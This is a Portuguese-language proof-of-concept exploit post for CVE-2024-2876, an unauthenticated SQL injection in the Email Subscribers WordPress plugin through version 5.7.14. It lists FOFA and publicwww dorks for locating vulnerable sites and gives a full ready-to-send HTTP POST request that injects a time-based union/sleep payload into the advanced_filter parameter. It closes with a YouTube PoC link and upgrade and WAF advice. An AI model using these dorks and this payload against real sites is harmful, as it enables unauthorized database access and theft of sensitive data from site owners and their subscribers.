
Exploit de prova de conceito para CVE-2024-2876, uma vulnerabilidade de injeção SQL não autenticada no plugin Email Subscribers para WordPress, permitindo a extração de dados sensíveis.
#Descrição da Vulnerabilidade: O plugin Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce para WordPress é vulnerável a SQL Injection através da função ‘run’ da classe ‘IG_ES_Subscribers_Query’ em todas as versões até e incluindo a 5.7.14, devido à fuga insuficiente no parâmetro fornecido pelo utilizador e à falta de preparação suficiente na consulta SQL existente. Isto permite que atacantes não autenticados acrescentem consultas SQL adicionais a consultas já existentes, que podem ser usadas para extrair informações sensíveis da base de dados.
#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"
#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#POC do YouTube: https://www.youtube.com/watch?v=eDEGt_yXyvE
#Como corrigir ? Uma vez que todas as versões até 5.7.14 foram detetadas com o CVE, recomenda-se que os utilizadores atualizem o plugin Email Subscribers by Icegram Express para a versão 5.7.15 (ou a versão mais recente 5.7.19). Os utilizadores do Patchstack têm a opção de ativar atualizações automáticas especificamente para plugins vulneráveis. Implemente uma solução WAF/WAAP como camada adicional de proteção. A vantagem de tais soluções é que, mesmo que a vulnerabilidade seja nova e desconhecida (0-day), ainda pode prevenir ataques ao detetar padrões e técnicas de exploração.